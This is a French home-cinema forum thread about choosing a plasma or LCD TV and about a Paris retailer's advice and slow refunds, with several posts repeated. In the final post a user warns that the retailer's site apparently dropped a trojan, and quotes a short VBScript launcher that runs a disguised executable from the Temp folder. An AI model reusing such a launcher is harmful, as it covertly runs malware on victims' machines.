Je suis passé ce matin chez Cobra à Paris pour avoir des avis et prix pour l'achat d'une tv (utilisation principale à 90% TNT via antenne collective) plasma ou LCD en HDready (diagonales de 37 à 42). J'ai lu pas mal les forums mais là le vendeur m'a un peu scié : pour lui il n'y a a pas photo, il m'a conseillé le full HD, m'a affirmé que les réglages d'usine étaient les meilleurs et m'a fait une comparaison d'un Pioneer HDready (désolé mais je ne sais pas quel modèle) et du Sony 40 KDL-W2000 full HD. Et effectivement en TNT l'image était beaucoup plus nette, moins d'effet d'escalier sur le Sony. Il m'a dit aussi qu'il n'y aurait plus de LCD HDready à la fabrication à la fin de cette année. Que penser de ces affirmations. Arguments commerciaux ou réalistes? Cobra sérieux ou pas?
Sinon pour mon utilisation (TNT via antenne collective à 90% et 10% DVD via péritel ou yuv) j'hésite encore entre tous ces modèles :
LCD Philips 37PFL7562, Samsung 40R86BD et Sony KDL40 D3000 (un poil au dessus de mon budget max)
Plasma Samsung PS42Q96HD, Pana TH-42PX 71 (qui pour le vendeur Cobra est à chier) et Hitachi P42T01
Merci de votre aide
|
12 messages • Page 1 sur 1
|
Modérateurs: Modération Forum Univers TV, Le Bureau de l’Association HCFR • Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 56 invités
Tout sur les écrans plats HD du marché (TV LCD, TV Plasmas, TV SED, ...)
personnelement je n'ai qu'une seule experience avec cobra, et on ne peu pas dire qu'elle soit tres bonne...
en gros je passe a la boutique pour l'achat d'un projo et d'un cable hdmi (je precise que je ne suis pas de paris, j'etais juste de passage). donc j'assiste a une demo du projo, mais bon j'etais deja pas mal fixe dessus, donc ca ne va pas bien loin. je paye mon projo et mon cable, je le retire au depot, et je pars avec sous le bras. je rentre chez moi, je branche le tout et je m'apercois que le cable ne fonctionne pas correctement. je telephone au sav qui me dit de faire tel ou tel test pour etre sur, ce que je fais (je telephone 3x, et j'ai 3 tests differents ). au final ils acceptent tout de meme le retour du cable. c'est a partir de la que ca fait mal, ils ont eu besoin de plus d'UN mois pour me faire parvenir le remboursement. et qui plus est j'en ai ete des frais de port de retour alors que ce sont eux qui m'ont vendu un cable defectueux (ils en ont atteste).
et je ne parle pas des innombrables coup de fils a leur service client surtaxe pour savoir ou mon remboursement en etait...
en gros ce cable defectueux que j'avais paye 150€ m'a coute pas loin de 40€ entre les frais de port et le telephone. je dis merci cobra
> en ce qui concerne leur conseil... ce sont des pousseurs de carton (sans etre mechant), donc il faut y aller pour leur prix, pas pour leur conseils technique...
en gros je passe a la boutique pour l'achat d'un projo et d'un cable hdmi (je precise que je ne suis pas de paris, j'etais juste de passage). donc j'assiste a une demo du projo, mais bon j'etais deja pas mal fixe dessus, donc ca ne va pas bien loin. je paye mon projo et mon cable, je le retire au depot, et je pars avec sous le bras. je rentre chez moi, je branche le tout et je m'apercois que le cable ne fonctionne pas correctement. je telephone au sav qui me dit de faire tel ou tel test pour etre sur, ce que je fais (je telephone 3x, et j'ai 3 tests differents ). au final ils acceptent tout de meme le retour du cable. c'est a partir de la que ca fait mal, ils ont eu besoin de plus d'UN mois pour me faire parvenir le remboursement. et qui plus est j'en ai ete des frais de port de retour alors que ce sont eux qui m'ont vendu un cable defectueux (ils en ont atteste).
et je ne parle pas des innombrables coup de fils a leur service client surtaxe pour savoir ou mon remboursement en etait...
en gros ce cable defectueux que j'avais paye 150€ m'a coute pas loin de 40€ entre les frais de port et le telephone. je dis merci cobra
> en ce qui concerne leur conseil... ce sont des pousseurs de carton (sans etre mechant), donc il faut y aller pour leur prix, pas pour leur conseils technique...
- axe666
- Inscription Forum: 12 Avr 2003 20:21
il a de l'humour ...
le full hd effectivement c'est bien mais il faut une source full hd non donc lecteur hd dvd ou blu-ray !
tout le monde n'a pas un lecteur full hd et c'est pas demain que nos bon vieux dvd passe à la poubelle.
la tv n'est pas encore en full hd et pas encore en 720p sauf sur sat ou adsl donc diffusion pour du hd ready non ?
aprés il faut aussi un grande image , sur un 32' est ce utile.
Bilan oui un full hd , c'est l'avenir mais pour une utilsation 90% tv je pense qu'un hd ready est largement suffisant ( avec un bon traitement vidéo , là se fait la diffèrence ) .
bonne chance !
le full hd effectivement c'est bien mais il faut une source full hd non donc lecteur hd dvd ou blu-ray !
tout le monde n'a pas un lecteur full hd et c'est pas demain que nos bon vieux dvd passe à la poubelle.
la tv n'est pas encore en full hd et pas encore en 720p sauf sur sat ou adsl donc diffusion pour du hd ready non ?
aprés il faut aussi un grande image , sur un 32' est ce utile.
Bilan oui un full hd , c'est l'avenir mais pour une utilsation 90% tv je pense qu'un hd ready est largement suffisant ( avec un bon traitement vidéo , là se fait la diffèrence ) .
bonne chance !
- kandinsky
- Inscription Forum: 21 Jan 2002 2:00
ça confirme ce que je pensais mais maintenant que prendre?
- noisegate
- Inscription Forum: 17 Juin 2007 19:05
J'ai personnellement attendu 3 mois pour le remboursement d'un lecteur DVD philips que j'avais acheté 300€ en promo et qui avait une qualité inférieur à mon kiss que j'avais payé 99€.
Je voulais au départ un dénon mais plus de stock meme apres 3 semaines d'attente.Alors j'ai fait jouer la semaine de rétractation pour le remboursement.Mais bon, j'ai du passer une heure au téléphone a force de téléphoner pour savoir ou en était mon remboursement....
Je voulais au départ un dénon mais plus de stock meme apres 3 semaines d'attente.Alors j'ai fait jouer la semaine de rétractation pour le remboursement.Mais bon, j'ai du passer une heure au téléphone a force de téléphoner pour savoir ou en était mon remboursement....
- locutus2borg
- Inscription Forum: 06 Nov 2006 13:18
Je me répéte mais pour mon utilisation (TNT via antenne collective à 90% et 10% DVD via péritel ou yuv) j'hésite encore entre tous ces modèles :
LCD Philips 37PFL7562, Samsung 40R86BD et Sony KDL40 D3000 (un poil au dessus de mon budget max)
Plasma Samsung PS42Q96HD, Pana TH-42PX 71 (qui pour le vendeur Cobra est à chier) et Hitachi P42T01
Je vois que le pana (est-il vraiment mauvais en SD TNT?) sur pas mal de sites a un tarif vraiment intéressant. Ne se vend-il pas ,trop de stock?
Merci de votre aide
Je vois que le pana (est-il vraiment mauvais en SD TNT?) sur pas mal de sites a un tarif vraiment intéressant. Ne se vend-il pas ,trop de stock?
Merci de votre aide
- noisegate
locutus2borg a écrit:J'ai personnellement attendu 3 mois pour le remboursement d'un lecteur DVD philips que j'avais acheté 300€ en promo et qui avait une qualité inférieur à mon kiss que j'avais payé 99€.
J'ai eu la même mésaventure avec un lecteur DVD marantz . il est tombé en panne chez moi ; est resté au SAV 1 mois puis quand il est revenu il ne fonctionnait pas plus !
- Laurent.Dy6
- Inscription Forum: 12 Oct 2004 17:30
a mon avis si tu veux une belle image prends un plasma.
en tnt ca serait bien meilleur et la consommation aussi )))
mais bon j'ai vu le samsung lcd 46 pouces M86/M87 en tnt et c'etait vraiment moche .....
en tnt ca serait bien meilleur et la consommation aussi )))
mais bon j'ai vu le samsung lcd 46 pouces M86/M87 en tnt et c'etait vraiment moche .....
- bravepitt
- Inscription Forum: 15 Juin 2004 15:03
la consammation d'un plasma est plus élevée que celle d'un LCD si je ne m'abuse?
- noisegate
Cabra ou Magma,
c'est bien quand on cherche un prix et qu'on sait ce que l'on veut.
Pour les pannes au déballage, ca arrive à tout le monde, les revendeurs ne sont pas responsables de ca.
c'est bien quand on cherche un prix et qu'on sait ce que l'on veut.
Pour les pannes au déballage, ca arrive à tout le monde, les revendeurs ne sont pas responsables de ca.
- philou9178
- Inscription Forum: 24 Nov 2006 12:59
- Localisation: Essonne 91- Squatteur épisodique Paris Stade Jean Bouin et Saint Denis Stade de France
en parlant de COBRA
j'ai reve ou leur site il tente d'intaller un trojan
qd je vais sur cette URL :
http://www.cobrason.com/pageproduit.asp?idproduit=3802
windows me dit que "windows scripting host" est desactive sur mon PC(hehe pas folle la guepe ).......et ca me cree un fichier C:\NTDETECT.EXE
et ce fichier ouvert dans notepad donne :
et le fameux .bat est en fait un .exe deguise
"C:\Documents and Settings\Administrator\Local Settings\Temp\microsofts.bat"
bon allez je raye leur site de mon fichier hosts
j'ai reve ou leur site il tente d'intaller un trojan
qd je vais sur cette URL :
http://www.cobrason.com/pageproduit.asp?idproduit=3802
windows me dit que "windows scripting host" est desactive sur mon PC(hehe pas folle la guepe ).......et ca me cree un fichier C:\NTDETECT.EXE
et ce fichier ouvert dans notepad donne :
Set Shell = CreateObject("Wscript.Shell")
'I'Love your I'Love your I'Love your
shell.run ("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\microsofts.bat")
Set Shell = Nothing
et le fameux .bat est en fait un .exe deguise
"C:\Documents and Settings\Administrator\Local Settings\Temp\microsofts.bat"
bon allez je raye leur site de mon fichier hosts
- leeperry
- Inscription Forum: 06 Jan 2007 19:44
|
12 messages
• Page 1 sur 1
|